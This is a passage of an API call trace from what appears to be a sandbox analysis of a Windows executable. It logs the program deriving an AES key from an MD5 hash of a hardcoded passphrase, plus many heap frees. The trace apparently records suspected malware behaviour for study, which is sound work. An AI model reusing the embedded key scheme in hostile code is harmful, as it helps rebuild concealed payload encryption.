CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0120.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0120.285] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0120.286] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0120.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.286] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0120.286] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0120.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0120.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.286] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0120.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca9a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0120.286] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0120.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0120.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0120.286] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0120.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0120.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0120.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0120.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca8e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0120.287] CryptHashData (hHash=0x41ac200, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0120.287] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.287] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0120.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca7c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0120.287] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac200, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac640) returned 1 [0120.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0120.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0120.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0120.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0120.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0120.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0120.289] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0120.289] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0120.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.290] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0120.348] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0120.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0120.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0120.349] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0120.349] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0120.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0120.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0120.350] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0120.350] CryptDestroyHash (hHash=0x41ac200) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0120.350] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0120.351] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0120.351] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.352] HeapFree (in: hHeap=0x1780000, 